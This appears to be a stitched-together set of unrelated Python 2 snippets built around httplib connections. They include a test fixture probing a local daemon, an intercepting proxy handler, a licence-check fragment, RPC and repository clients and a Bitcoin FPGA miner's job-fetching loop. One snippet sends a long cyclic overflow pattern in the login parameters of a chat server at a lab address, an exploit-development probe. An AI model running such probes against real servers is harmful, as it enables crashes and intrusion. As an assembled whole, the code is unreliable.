# Random run identifier for dtcd interactions.
# NOTE(review): `uuid` is not among the imports visible in this chunk --
# confirm it is imported earlier in the file.
dtcd_uuid = str(uuid.uuid4())
# check the dtcd: probe its REST endpoint once at import time and record
# availability so tests can skip when the daemon is absent.
try:
    cx = httplib.HTTPConnection('localhost:7623')
    cx.request('GET', '/v1/network/')
    cx.getresponse()
    has_dtcd = True
except:
    has_dtcd = False

# Address space carved up for the tests: one /16 (v4) and /48 (v6) supernet,
# pre-split into per-test /24 and /64 subnets.
supernet = {
    'ipv4': netaddr.IPNetwork('172.16.0.0/16'),
    'ipv6': netaddr.IPNetwork('fdb3:84e5:4ff4::/48')
}
network_pool = {
    'ipv4': list(supernet['ipv4'].subnet(24)),
    'ipv6': list(supernet['ipv6'].subnet(64))
}
# Subnets currently handed out, keyed by whoever claimed them.
allocations = {}
def __init__(self, name, prefix, url="uv-cdat.llnl.gov"):
    """Record the repository's identity and open an HTTP connection to it."""
    self.repo_name = name
    self.repo_prefix = prefix
    self.repo_url = url
    self.H = httplib.HTTPConnection(url)
def getProxy(): try: pr = httplib.HTTPConnection(options.proxy) pr.connect() proxy_handler = urllib2.ProxyHandler({'http': options.proxy}) except(socket.timeout):
def do_GET(self):
    """Proxy handler: forward the client's request upstream and relay the
    answer back, giving request_handler/response_handler a chance to veto
    (return False -> 403) or rewrite either body.

    Connections are cached per (scheme, netloc) origin in thread-local
    storage; bodies without a Content-Length and marked no-store are
    streamed instead of buffered.
    """
    # Magic URL that serves our CA certificate to clients.
    if self.path == 'http://proxy2.test/':
        self.send_cacert()
        return

    req = self
    content_length = int(req.headers.get('Content-Length', 0))
    req_body = self.rfile.read(content_length) if content_length else None

    # Rebuild an absolute URL for transparent (origin-form) requests.
    if req.path[0] == '/':
        if isinstance(self.connection, ssl.SSLSocket):
            req.path = "https://%s%s" % (req.headers['Host'], req.path)
        else:
            req.path = "http://%s%s" % (req.headers['Host'], req.path)

    req_body_modified = self.request_handler(req, req_body)
    if req_body_modified is False:
        self.send_error(403)
        return
    elif req_body_modified is not None:
        req_body = req_body_modified
        req.headers['Content-length'] = str(len(req_body))

    u = urlparse.urlsplit(req.path)
    scheme, netloc, path = u.scheme, u.netloc, (u.path + '?' + u.query if u.query else u.path)
    assert scheme in ('http', 'https')
    if netloc:
        req.headers['Host'] = netloc
    setattr(req, 'headers', self.filter_headers(req.headers))

    try:
        # Reuse one upstream connection per origin (thread-local cache).
        origin = (scheme, netloc)
        if origin not in self.tls.conns:
            if scheme == 'https':
                self.tls.conns[origin] = httplib.HTTPSConnection(
                    netloc, timeout=self.timeout)
            else:
                self.tls.conns[origin] = httplib.HTTPConnection(
                    netloc, timeout=self.timeout)
        conn = self.tls.conns[origin]
        conn.request(self.command, path, req_body, dict(req.headers))
        res = conn.getresponse()

        version_table = {10: 'HTTP/1.0', 11: 'HTTP/1.1'}
        setattr(res, 'headers', res.msg)
        setattr(res, 'response_version', version_table[res.version])

        # support streaming
        # BUG FIX: headers.get('Cache-Control') returns None when the header
        # is absent, making the `in` test raise TypeError; default to ''.
        if ('Content-Length' not in res.headers
                and 'no-store' in res.headers.get('Cache-Control', '')):
            self.response_handler(req, req_body, res, '')
            setattr(res, 'headers', self.filter_headers(res.headers))
            self.relay_streaming(res)
            with self.lock:
                self.save_handler(req, req_body, res, '')
            return

        res_body = res.read()
    except Exception as e:
        # Drop the (possibly poisoned) cached connection and report a
        # gateway failure.
        if origin in self.tls.conns:
            del self.tls.conns[origin]
        self.send_error(502)
        return

    content_encoding = res.headers.get('Content-Encoding', 'identity')
    res_body_plain = self.decode_content_body(res_body, content_encoding)

    res_body_modified = self.response_handler(req, req_body, res, res_body_plain)
    if res_body_modified is False:
        self.send_error(403)
        return
    elif res_body_modified is not None:
        res_body_plain = res_body_modified
        res_body = self.encode_content_body(res_body_plain, content_encoding)
        res.headers['Content-Length'] = str(len(res_body))

    setattr(res, 'headers', self.filter_headers(res.headers))

    # Relay status line, headers and body back to the client.
    self.wfile.write("%s %d %s\r\n" % (self.protocol_version, res.status, res.reason))
    for line in res.headers.headers:
        self.wfile.write(line)
    self.end_headers()
    self.wfile.write(res_body)
    self.wfile.flush()

    with self.lock:
        self.save_handler(req, req_body, res, res_body_plain)
def clearListenerResults():
    """Ask the local listener (port 8081) to discard its recorded requests."""
    listener = httplib.HTTPConnection("localhost:8081")
    listener.request("GET", "/clear_requests")
    listener.getresponse()
    listener.close()
#Verify that the customer is an authorized user ################################### try: w = open(RegCodeFile, 'rb') except IOError: #print "Don't find register code file in localhost" sys.exit(103) else: data = w.read() w.close() ##################################### try: w = open(EDPubKeyFile, 'rb') except: connection = httplib.HTTPConnection(vhostname + ":" + vport) connection.request('GET', '/software/verify/ed/' + serialnum) respmsg = connection.getresponse() if respmsg.status == 200: result = respmsg.read() f = open(EDPubKeyFile, 'w') f.write(result) f.close() else: sys.exit(104) else: w.close() ####################################### try: publickey = RSA.load_pub_key(EDPubKeyFile) decrypthardinfo = publickey.public_decrypt(data, RSA.pkcs1_padding)
import string, sys import socket, httplib buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" url = "/chat.ghp?username="******"&password="******"&room=1&sex=2" print "Running...\r\n" print url conn = httplib.HTTPConnection("172.16.73.129",80) conn.request("GET", url) r1 = conn.getresponse() print r1.status, r1.reason conn.close()
def connect(scheme, netloc):
    """Build an httplib connection to *netloc* for the given URL scheme.

    Raises UnsupportedSchemeError for anything other than http/https.
    """
    factories = {
        'http': httplib.HTTPConnection,
        'https': httplib.HTTPSConnection,
    }
    try:
        factory = factories[scheme]
    except KeyError:
        raise UnsupportedSchemeError()
    return factory(netloc)
def __init__(self, server_url):
    """Remember *server_url* and open a loopback connection to its port.

    The port is the third ':'-separated field of the URL, truncated at the
    first '/', e.g. "http://host:8000/path" -> 8000.
    """
    self._server_url = server_url
    port_field = server_url.split(':')[2]
    port = int(port_field.split('/')[0])
    self._http_client = httplib.HTTPConnection('127.0.0.1', port, timeout=30)
def __init__(self, host, port, username, password):
    """Precompute a Basic-auth header and open the RPC connection
    (non-strict, 30 s timeout)."""
    credentials = "%s:%s" % (username, password)
    encoded = base64.b64encode(credentials)
    self.authhdr = "Basic %s" % encoded
    self.conn = httplib.HTTPConnection(host, port, False, 30)
def getwork(self):
    """Work-fetching loop: poll the configured pool servers for getwork jobs.

    Runs forever; each round tries servers in order (skipping ones in
    back-off), queues the first job obtained, and sleeps a second when every
    server failed. Also discovers the pool's long-polling URL once and
    spawns the long-polling worker thread.
    """
    while True:
        job = None
        for s in self.servers:
            # Back-off: a failed server sits out `disabled` rounds.
            if s.disabled > 0:
                s.disabled = s.disabled - 1
                continue
            try:
                self.requests = self.requests + 1
                conn = httplib.HTTPConnection(s.host, s.port, True,
                                              self.getworktimeout)
                req = json.dumps({
                    "method": "getwork",
                    "params": [],
                    "id": 0
                })
                headers = {
                    "User-Agent": "PyFPGAMiner " + miner.version,
                    "Content-type": "application/json",
                    "Content-Length": len(req),
                    "Authorization": self.auth
                }
                conn.request("POST", s.path, req, headers)
                response = conn.getresponse()
                # One-time long-polling discovery via the advertised header.
                if not self.longpolling:
                    headers = response.getheaders()
                    for h in headers:
                        if h[0] == "x-long-polling":
                            url = h[1]
                            try:
                                # Relative URLs are resolved against this
                                # server; only http://host:port/path accepted.
                                if url[0] == "/":
                                    url = "http://" + s.host + ":" + str(
                                        s.port) + url
                                if url[:7] != "http://":
                                    raise Exception()
                                parts = url[7:].split("/", 2)
                                path = "/" + parts[1]
                                parts = parts[0].split(":")
                                if len(parts) != 2:
                                    raise Exception()
                                host = parts[0]
                                port = parts[1]
                                self.miner.log(
                                    "Found long polling URL for %s: %s\n" %
                                    (self.name, url), self.miner.green)
                                self.longpolling = True
                                self.longpollingthread = threading.Thread(
                                    None, self.longpollingworker,
                                    self.name + "_longpolling",
                                    (host, port, path))
                                self.longpollingthread.daemon = True
                                self.longpollingthread.start()
                            except:
                                self.miner.log(
                                    "Invalid long polling URL for %s: %s\n" %
                                    (self.name, url))
                            break
                # Decode the job: midstate and data arrive hex-encoded.
                response = json.loads(response.read())
                state = binascii.unhexlify(response["result"]["midstate"])
                data = binascii.unhexlify(response["result"]["data"])
                job = Job(self, state, data)
                break
            except Exception as e:
                self.miner.log(
                    "Error while requesting job from %s (%s:%d): %s\n" %
                    (self.name, s.host, s.port, e))
                s.disabled = 10  # sit out the next ten rounds
                self.failedreqs = self.failedreqs + 1
        if job != None:
            # A long-poll response that beat us to it makes this job stale.
            if self.longpollhit:
                self.longpollkilled = self.longpollkilled + 1
            else:
                self.queue.put(job)
            self.longpollhit = False
        else:
            time.sleep(1)